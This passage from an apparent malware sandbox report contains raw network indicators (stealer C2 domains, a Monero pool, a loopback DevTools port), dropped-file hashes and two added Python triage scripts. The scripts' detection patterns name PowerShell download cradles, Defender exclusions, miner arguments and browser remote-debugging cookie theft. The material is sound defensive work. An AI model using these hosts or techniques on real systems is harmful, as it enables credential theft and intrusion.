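    "| Country | Destination | Domain | Proto |",
    "| NL | 45.144.212.77:16000 | 45.144.212.77 | tcp |",
    "| US | 8.8.8.8:53 | dawtastream.bet | udp |",
    "| US | 8.8.8.8:53 | pool.hashvault.pro | udp |",
    "| DE | 192.248.189.11:443 | pool.hashvault.pro | tcp |",
    "| NL | 45.154.98.175:6969 | tcp | |",
    "| US | 8.8.8.8:53 | towerbingobongoboom.com | udp |",
    "| US | 213.209.150.137:4000 | towerbingobongoboom.com | tcp |",
    "| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |",
    "| N/A | 127.0.0.1:9223 | tcp | |",
    "| US | 8.8.8.8:53 | github.com | udp |",
    "| GB | 20.26.156.215:443 | github.com | tcp |",
]

MINER_FLAGS = re.compile(r"--donate-level|--cpu-max-threads-hint|(?:^|\s)-o\s+\S+:\d+")
MONERO_ADDR = re.compile(r"\b4[1-9A-HJ-NP-Za-km-z]{94}\b")   # standard 95-char Monero address
POOL = re.compile(r"(?:^|\s)-o\s+(\S+)")
DEBUG_PORT = re.compile(r"--remote-debugging-port=(\d+)")
PID_POLL = re.compile(r'tasklist\s+/FI\s+"PID eq (\d+)"', re.I)
EXCLUSION = re.compile(r'Add-MpPreference\s+-Exclusion\w*\s+"?([^"]+)', re.I)
CRADLE = re.compile(r"Invoke-WebRequest|DownloadString|DownloadFile|\biwr\b", re.I)
URL = re.compile(r"""https?://[^\s'"]+""")
BROWSERS = {"chrome.exe", "msedge.exe"}


def triage_process(image, cmdline):
    """Return a list of findings (dicts with a 'tag') for one (image, command line) entry."""
    name = image.rsplit("\\", 1)[-1].lower()
    out = []
    if MINER_FLAGS.search(cmdline) or MONERO_ADDR.search(cmdline):
        pool = POOL.search(cmdline)
        out.append({"tag": "xmrig_args", "image": name, "pool": pool and pool.group(1)})
        if name != "xmrig.exe":   # miner arguments under a system binary: the image was hollowed
            out.append({"tag": "miner_args_in_unexpected_image", "image": name})
    m = DEBUG_PORT.search(cmdline)
    if m and name in BROWSERS and "--type=" not in cmdline:   # only the main-process launch, not renderers
        out.append({"tag": "browser_remote_debugging", "image": name, "port": int(m.group(1))})
    m = PID_POLL.search(cmdline)
    if m:
        out.append({"tag": "pid_liveness_poll", "image": name, "pid": int(m.group(1))})
    m = EXCLUSION.search(cmdline)
    if m:
        out.append({"tag": "defender_exclusion", "image": name, "path": m.group(1)})
    if "powershell" in cmdline.lower() and CRADLE.search(cmdline):
        out.append({"tag": "ps_download_cradle", "image": name, "urls": URL.findall(cmdline),
                    "hidden": "-WindowStyle Hidden" in cmdline})
    return out


def parse_row(line):
    """Parse one '| CC | ip:port | domain | proto |' row; None for the header; tolerates shifted rows."""
    cells = [c.strip() for c in line.strip().strip("|").split("|")]
    if len(cells) != 4:
        return None
    country, dest, domain, proto = cells
    if proto == "" and domain in ("tcp", "udp"):   # Domain cell missing, proto slid left
        domain, proto = "", domain
    host, _, port = dest.rpartition(":")
    if not port.isdigit():
        return None
    return {"country": country, "host": host, "port": int(port), "domain": domain, "proto": proto}


def triage_network(rows):
    recs = [r for r in map(parse_row, rows) if r]
    resolved = {r["domain"] for r in recs if r["port"] == 53 and r["domain"]}
    contacted = {r["domain"] for r in recs if r["port"] != 53 and r["domain"]}
    external = [r for r in recs if r["proto"] == "tcp" and not r["host"].startswith("127.")]
    return {
        "dns_only": sorted(resolved - contacted),            # resolved, never connected to
        "nonstandard_ports": sorted({(r["host"], r["port"]) for r in external if r["port"] not in (80, 443)}),
        "direct_ip": sorted({r["host"] for r in external if r["domain"] in ("", r["host"])}),
        "loopback_ports": sorted({r["port"] for r in recs if r["host"] == "127.0.0.1"}),
    }


def triage_report(processes, rows):
    findings = [f for img, cmd in processes for f in triage_process(img, cmd)]
    net = triage_network(rows)
    debug_ports = {f["port"] for f in findings if f["tag"] == "browser_remote_debugging"}
    net["debug_port_confirmed"] = sorted(debug_ports & set(net["loopback_ports"]))   # flag seen AND used
    return findings, net


if __name__ == "__main__":
    found, summary = triage_report(PROCESSES, NETWORK_ROWS)
    print(*found, summary, sep="\n")
```

Two of the cross-checks are the ones worth reproducing in a SIEM: a browser launched with `--remote-debugging-port` is only evidence of cookie theft over the DevTools protocol once something actually connects to that loopback port, which the `127.0.0.1:9223` rows confirm here; and the long tail of `.bet`/`.top`/`.fun` names that appear only as DNS queries (no TCP follow-up) is the fallback-domain rotation a stealer walks through until one resolves, so the resolved-but-never-contacted set is as useful for blocking as the hosts that were reached.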
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| NL | 45.144.212.77:16000 | 45.144.212.77 | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
| LU | 45.59.120.8:80 | 45.59.120.8 | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| NL | 45.154.98.175:6969 | | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 192.248.189.11:443 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | dawtastream.bet | udp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 8.8.8.8:53 | collapimga.fun | udp |
| US | 8.8.8.8:53 | seizedsentec.online | udp |
| US | 8.8.8.8:53 | strawpeasaen.fun | udp |
| US | 8.8.8.8:53 | quietswtreams.life | udp |
| US | 8.8.8.8:53 | starrynsightsky.icu | udp |
| US | 8.8.8.8:53 | earthsymphzony.today | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | farmingtzricks.top | udp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| DE | 5.75.210.149:443 | | tcp |
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | moderzysics.top | udp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 8.8.8.8:53 | biochextryhub.bet | udp |
| US | 104.21.68.89:443 | biochextryhub.bet | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.68.89:443 | biochextryhub.bet | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.68.89:443 | biochextryhub.bet | tcp |
| US | 104.21.68.89:443 | biochextryhub.bet | tcp |
| NL | 45.144.212.77:16000 | 45.144.212.77 | tcp |
| US | 104.21.68.89:443 | biochextryhub.bet | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | ls.t.goldenloafuae.com | udp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 104.21.68.89:443 | biochextryhub.bet | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 8.8.8.8:53 | e5.o.lencr.org | udp |
| GB | 104.86.110.200:80 | e5.o.lencr.org | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 8.8.8.8:53 | joyfulhezart.tech | udp |
| US | 8.8.8.8:53 | hardswarehub.today | udp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | hardrwarehaven.run | udp |
| US | 8.8.8.8:53 | techmindzs.live | udp |
| US | 8.8.8.8:53 | codxefusion.top | udp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 8.8.8.8:53 | towerbingobongoboom.com | udp |
| US | 213.209.150.137:4000 | towerbingobongoboom.com | tcp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| US | 213.209.150.137:4117 | towerbingobongoboom.com | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 8.8.8.8:53 | www.dropbox.com | udp |
| GB | 162.125.64.18:443 | www.dropbox.com | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| CH | 185.208.156.162:80 | 185.208.156.162 | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 172.217.169.74:443 | ogads-pa.googleapis.com | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| GB | 216.58.201.110:443 | apis.google.com | tcp |
| GB | 172.217.169.74:443 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.200.14:443 | play.google.com | tcp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.180.14:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 172.217.169.65:443 | clients2.googleusercontent.com | tcp |
| N/A | 127.0.0.1:9223 | | tcp |
| N/A | 127.0.0.1:9223 | | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 150.171.28.10:443 | | tcp |
| US | 8.8.8.8:53 | exarthynature.run | udp |
| US | 104.21.112.1:443 | exarthynature.run | tcp |
| US | 104.21.112.1:443 | exarthynature.run | tcp |
| N/A | 127.0.0.1:9223 | | tcp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 20.189.173.21:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 104.21.112.1:443 | exarthynature.run | tcp |
| US | 104.21.112.1:443 | exarthynature.run | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 104.21.112.1:443 | exarthynature.run | tcp |
| N/A | 127.0.0.1:9223 | | tcp |
| US | 104.21.112.1:443 | exarthynature.run | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| N/A | 127.0.0.1:9223 | | tcp |
| N/A | 127.0.0.1:9223 | | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 150.171.28.10:443 | | tcp |
| US | 150.171.28.10:443 | | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | | tcp |
| US | 150.171.28.10:443 | | tcp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 20.189.173.22:443 | nw-umwatson.events.data.microsoft.com | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 8.8.8.8:53 | uncertainyelemz.bet | udp |
| US | 8.8.8.8:53 | hobbyedsmoker.live | udp |
| US | 8.8.8.8:53 | dsfljsdfjewf.info | udp |
| US | 8.8.8.8:53 | deaddereaste.today | udp |
| US | 8.8.8.8:53 | subawhipnator.life | udp |
| US | 8.8.8.8:53 | privileggoe.live | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | pastedeputten.life | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| US | 8.8.8.8:53 | dawtastream.bet | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 8.8.8.8:53 | collapimga.fun | udp |
| US | 8.8.8.8:53 | seizedsentec.online | udp |
| US | 8.8.8.8:53 | strawpeasaen.fun | udp |
| US | 8.8.8.8:53 | quietswtreams.life | udp |
| US | 8.8.8.8:53 | starrynsightsky.icu | udp |
| US | 8.8.8.8:53 | earthsymphzony.today | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 8.8.8.8:53 | croprojegies.run | udp |
| US | 104.21.64.1:443 | croprojegies.run | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 104.21.64.1:443 | croprojegies.run | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 104.21.64.1:443 | croprojegies.run | tcp |
| US | 104.21.64.1:443 | croprojegies.run | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 104.21.64.1:443 | croprojegies.run | tcp |
| N/A | 127.0.0.1:9223 | | tcp |
| N/A | 127.0.0.1:9223 | | tcp |
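The table above is raw sandbox output, and most of its rows are repeats or benign background traffic (resolver, CDN, telemetry). The script below is an added example, not part of this report or of any sandbox vendor's code: it parses rows in exactly this pipe-delimited format, separates DNS lookups from real connections, and pulls out the indicators an analyst checks first. The sample rows are copied from the table above (including two rows whose hostname column is empty, one of them with the protocol shifted one column left, as raw exports sometimes render them); the set of "standard" ports and the category names are assumptions made for this example.

```python
"""Triage the pipe-delimited network table from a sandbox report.

Added example, not part of the original report. It parses rows in the
format used above, separates DNS lookups from real connections, and
buckets the connections an analyst would look at first.
"""
import re
from collections import namedtuple

Conn = namedtuple("Conn", "cc ip port host proto")

# Constructed sample: a subset of rows copied from the table above. The last
# two rows have an empty hostname column; the final one also has the protocol
# shifted one column left, as some raw exports render it.
SAMPLE_ROWS = """\
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 45.144.212.77:16000 | 45.144.212.77 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | towerbingobongoboom.com | udp |
| US | 213.209.150.137:4000 | towerbingobongoboom.com | tcp |
| US | 213.209.150.137:4117 | towerbingobongoboom.com | tcp |
| US | 8.8.8.8:53 | joyfulhezart.tech | udp |
| US | 104.21.68.89:443 | biochextryhub.bet | tcp |
| US | 8.8.8.8:53 | www.dropbox.com | udp |
| GB | 162.125.64.18:443 | www.dropbox.com | tcp |
| N/A | 127.0.0.1:9223 | | tcp |
| US | 150.171.28.10:443 | tcp |
"""

ROW_RE = re.compile(
    r"^\|\s*(?P<cc>[^|]*?)\s*"
    r"\|\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)\s*"
    r"\|\s*(?P<c3>[^|]*?)\s*"
    r"\|\s*(?P<c4>[^|]*?)\s*\|?\s*$"
)
PROTOS = {"tcp", "udp"}
STANDARD_PORTS = {53, 80, 443}  # assumption: ports that need no second look on their own


def parse_rows(text):
    """Parse table rows into Conn records, tolerating an empty or shifted hostname column."""
    conns = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        c3, c4 = m["c3"], m["c4"]
        if not c4 and c3.lower() in PROTOS:
            host, proto = "", c3.lower()      # hostname column missing, protocol shifted left
        else:
            host, proto = c3, c4.lower()
        conns.append(Conn(m["cc"], m["ip"], int(m["port"]), host, proto))
    return conns


def is_dns_lookup(c):
    return c.port == 53 and c.proto == "udp"


def triage(conns):
    """Bucket non-DNS connections into the categories worth a second look."""
    findings = {"loopback": [], "bare_ip": [], "no_hostname": [],
                "nonstandard_port": [], "resolved_only": []}
    resolved, contacted = set(), set()

    def add(cat, c):
        key = f"{c.ip}:{c.port}/{c.proto}"
        if key not in findings[cat]:      # de-duplicate the report's repeated rows
            findings[cat].append(key)

    for c in conns:
        if is_dns_lookup(c):
            resolved.add(c.host)
            continue
        if c.host:
            contacted.add(c.host)
        if c.ip.startswith("127."):
            add("loopback", c)            # local listener, e.g. a browser remote-debugging port
            continue
        if c.host == c.ip:
            add("bare_ip", c)             # contacted by IP literal, no DNS name involved
        elif not c.host:
            add("no_hostname", c)         # report gave no name; resolve or look up manually
        if c.port not in STANDARD_PORTS:
            add("nonstandard_port", c)
    # Names looked up but never connected to: backup C2, dead domains or decoys.
    findings["resolved_only"] = sorted(resolved - contacted)
    return findings


if __name__ == "__main__":
    for cat, items in triage(parse_rows(SAMPLE_ROWS)).items():
        print(f"{cat:17s} {items}")
```

Two caveats when turning the output into blocks: the 104.21.x.x and 172.67.x.x addresses in the table are Cloudflare-fronted, so block on the hostnames, not the IPs; and a loopback connection on a high port should be confirmed against the process tree before it is treated as anything more than a local inter-process channel.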
Files
memory/116-0-0x0000000000700000-0x0000000000BB0000-memory.dmp
memory/116-1-0x0000000077034000-0x0000000077036000-memory.dmp
memory/116-2-0x0000000000701000-0x000000000072F000-memory.dmp
memory/116-3-0x0000000000700000-0x0000000000BB0000-memory.dmp
memory/116-4-0x0000000000700000-0x0000000000BB0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
| MD5 | 457a48e9c0a205ea619dd5d5b4c2a6c3 |
| SHA1 | 15b8560577817747c13dc391d973ad2e26901315 |
| SHA256 | f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e |
| SHA512 | ce53209091c4e22937bf82bd55e219347d4d3a5c339db8b5605ee4753edc2dbe292c40a3da7d736908c27f5c99636fd3c06ab4c81254366d89801cf3d9037e5a |
memory/116-18-0x0000000000700000-0x0000000000BB0000-memory.dmp
memory/4896-17-0x0000000000050000-0x0000000000500000-memory.dmp
memory/4896-19-0x0000000000051000-0x000000000007F000-memory.dmp
memory/4896-20-0x0000000000050000-0x0000000000500000-memory.dmp
memory/4896-21-0x0000000000050000-0x0000000000500000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
| MD5 | 5b3ed060facb9d57d8d0539084686870 |
| SHA1 | 9cae8c44e44605d02902c29519ea4700b4906c76 |
| SHA256 | 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207 |
| SHA512 | 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a |
C:\Users\Admin\AppData\Local\Temp\D64B.tmp\D64C.tmp\D64D.bat
| MD5 | 3895cb9413357f87a88c047ae0d0bd40 |
| SHA1 | 227404dd0f7d7d3ea9601eecd705effe052a6c91 |
| SHA256 | 8140df06ebcda4d8b85bb00c3c0910efc14b75e53e7a1e4f7b6fa515e4164785 |
| SHA512 | a886081127b4888279aba9b86aa50a74d044489cf43819c1dea793a410e39a62413ceb7866f387407327b348341b2ff03cbe2430c57628a5e5402447d3070ca1 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mimzltsg.xrf.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3108-38-0x000001C7A7A30000-0x000001C7A7A52000-memory.dmp
memory/4896-48-0x0000000000050000-0x0000000000500000-memory.dmp
memory/4896-49-0x0000000000050000-0x0000000000500000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
| MD5 | 73636685f823d103c54b30bc457c7f0d |
| SHA1 | 597dba03dce00cf6d30b082c80c8f9108ae90ccf |
| SHA256 | 1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c |
| SHA512 | 183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7 |
C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
| MD5 | 47177b7fbf1ce282fb87da80fd264b3f |
| SHA1 | d07d2f9624404fa882eb94ee108f222d76bbbd4c |
| SHA256 | e3a190fc0f3e2be612c896ad1bda174271ee57d493f1b39030de1cbb5b7090eb |
| SHA512 | 059db11d303355b85e94031a54b0e6bac30bc9e2475bf3fceb9c01063af6f593d455fb54f8893ca37a150b598a9863b04f37056ef589656a6e83da719b330db9 |
memory/1860-92-0x0000000000090000-0x00000000000A0000-memory.dmp
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
| MD5 | 1dc908064451d5d79018241cea28bc2f |
| SHA1 | f0d9a7d23603e9dd3974ab15400f5ad3938d657a |
| SHA256 | d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454 |
| SHA512 | 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f |
memory/2248-106-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 556084f2c6d459c116a69d6fedcc4105 |
| SHA1 | 633e89b9a1e77942d822d14de6708430a3944dbc |
| SHA256 | 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8 |
| SHA512 | 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | eb4d127b8a6f84a1cee423c5e3e3a51d |
| SHA1 | c55263a8ff097067f2393ce2120801a445fd1949 |
| SHA256 | d73b077e2ae7f7608ebf774fb83ab13c7bc7a5c3e4d9d96fda2bf695dc698514 |
| SHA512 | 45a52004f8b63ac089de017437ba0e03335f18469942795d36ce3c3d017f842e582103c91e07d9af0fa8dfbbe6f2f68f2fac91383a48b6535952a8630911f21e |
C:\Users\Admin\AppData\Local\Temp\installer.ps1
| MD5 | b6d611af4bea8eaaa639bbf024eb0e2d |
| SHA1 | 0b1205546fd80407d85c9bfbed5ff69d00645744 |
| SHA256 | 8cd3bf95cedcf3469d0044976c66cbf22cd2fecf21ae4f94986d7211d6ba9a2b |
| SHA512 | d8a4ec5bd986884959db3edfd48e2bf4c70ead436f81eab73b104aa0ff0f5dadfb6227cb2dab1f979f0dbb3aafbc1889ed571fb6e9444a09ae984b789314463d |
\??\c:\Users\Admin\AppData\Local\Temp\31xayw5v\31xayw5v.cmdline
| MD5 | b0a97c4ef81b608d237aa9925507d758 |
| SHA1 | dcbab80b6ed3c9b29fb747184cd9f99079e3cd62 |
| SHA256 | 81edfd330be163406ec87563259246365f85000713715931915a19c9c688f554 |
| SHA512 | 57c9339aa6503fd0cdbb6122ecff3b7528e6059c43eb51b3023e76d1bc4b176cf642904e835f73320127ee29e234d1ce3df3a5ffaa1ca20483cbfbd29f47c0a6 |
\??\c:\Users\Admin\AppData\Local\Temp\31xayw5v\31xayw5v.0.cs
| MD5 | 1809fe3ba081f587330273428ec09c9c |
| SHA1 | d24ea2ea868ae49f46c8a7d894b7fda255ec1cd9 |
| SHA256 | d07a0c5fdf0862325608791f92273e0fc411c294f94d757f1ff0303ba5e03457 |
| SHA512 | e662420fc93a5cefd657f7701432924e6a06482ea147ad814d5e20b16b2f3c13ed2cc6b9caf24c22b7a5b24ad0aa1d216c5804c46d2250522cfc2cadc69f9e28 |
C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe
| MD5 | 8a632abe880092fb8fe1d3c882c417a5 |
| SHA1 | d3773cc8e6dc6dcd757a5cbc3269b435885fbbf4 |
| SHA256 | 7f37d73657533b0e599dfac9fb0267c3e38342f1aeb475e3b72421440c95ece7 |
| SHA512 | 3f9238f924e2cf022bd4d9c9c151b85055cd969561304de47baec945754e4e7b63e00a5ec7cfb2344d9c71c4a75e9a0d7f0c4fa16a0707cef87619240e63c196 |
\??\c:\Users\Admin\AppData\Local\Temp\31xayw5v\CSC124C6D5AD9C742CBB436A684BDC2DF.TMP
| MD5 | b4db40efa0a6c339775119fd65ac7774 |
| SHA1 | c1286ca53d011ce3af29dee628ea1df5443fef7a |
| SHA256 | 95a254b423795a88d26cf9459cc9e90472f6f841b1feb4a03de072437325d386 |
| SHA512 | 7ca0c31d75e0ffd25f1a2a4b193e071486bf2b72864f0ba66396890d7618c64c8ad2685531b1830e52850bf26e3f08678bc54c9d163a078344ab02b03c5d54d2 |
C:\Users\Admin\AppData\Local\Temp\RES981.tmp
| MD5 | f4baf6525524b6d8310d1b9ce97b7912 |
| SHA1 | ea49a8d869c33707a3ae3df850336e854e663f5a |
| SHA256 | 89d81474b80715e8d8b2324c09b55303882cf26c411701440d1eae44d39f8772 |
| SHA512 | 5fcf4232d926cbcc62c8e62bfa9e681a41cbecec7e25319dfff1fad7593eecdf974f3a55acaa7cf1547482407c0c972d2eb3f7afb3abdb3446e7a76763106d17 |
C:\Users\Admin\AppData\Local\Temp\31xayw5v\31xayw5v.dll
| MD5 | 9f316e686aefeaa30f888c113bb67979 |
| SHA1 | cf37006f975033c2d6374f9a83c34bc1b73a99c9 |
| SHA256 | fc7a3f3605a0f1b10b7c53e3c30390f017e4e9952e07b20998e4b273f55a3f35 |
| SHA512 | 1a3ff2fe8a7d22b795fb2d91aa397b17a9a8a8c7acaf4412243cf954905f52ac977dac8a2340943363f02a1a5044c367d977291d7b1b12019841428f966f0623 |
memory/3544-148-0x000001EDE9370000-0x000001EDE9378000-memory.dmp
memory/3384-159-0x000000000D360000-0x000000000DBE3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\e90hfFDx3.hta
| MD5 | 669676d809b6f2dbc59f8daee5089422 |
| SHA1 | 8b5a524d68c4fdeee7c32cfdc92146883fb43dad |
| SHA256 | cb5d2e3ee77c765a8eae3d9b904021e37584d389683c1dedfdcadc0c55d94509 |
| SHA512 | e425979059a2a0aaee3456561e7fdb87aaae64bd3a5eab59f79801e1a22fe066eb55ce8ce330379311b1b9ae899d3ae11ca85d120adb4bf09ab13fccc5c1af1c |
memory/1844-169-0x0000000002B40000-0x0000000002B76000-memory.dmp
memory/4896-170-0x0000000000050000-0x0000000000500000-memory.dmp
memory/1844-171-0x00000000053D0000-0x00000000059F8000-memory.dmp
memory/1844-172-0x0000000005280000-0x00000000052A2000-memory.dmp
memory/1844-173-0x0000000005A70000-0x0000000005AD6000-memory.dmp
memory/1844-174-0x0000000005AE0000-0x0000000005B46000-memory.dmp
memory/1844-184-0x0000000005CF0000-0x0000000006044000-memory.dmp
